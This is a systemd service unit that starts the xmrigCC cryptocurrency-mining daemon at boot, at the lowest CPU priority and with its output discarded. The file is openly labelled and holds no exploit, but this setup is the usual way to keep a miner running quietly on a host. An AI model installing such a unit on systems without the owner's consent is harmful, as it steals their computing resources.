[Unit]
Description=xmrigCC Daemon

[Service]
ExecStart=/usr/bin/nice -n 19 /etc/xmrigCC/xmrigDaemon
StandardOutput=null

[Install]
WantedBy=multi-user.target
Alias=xmrigcc.service
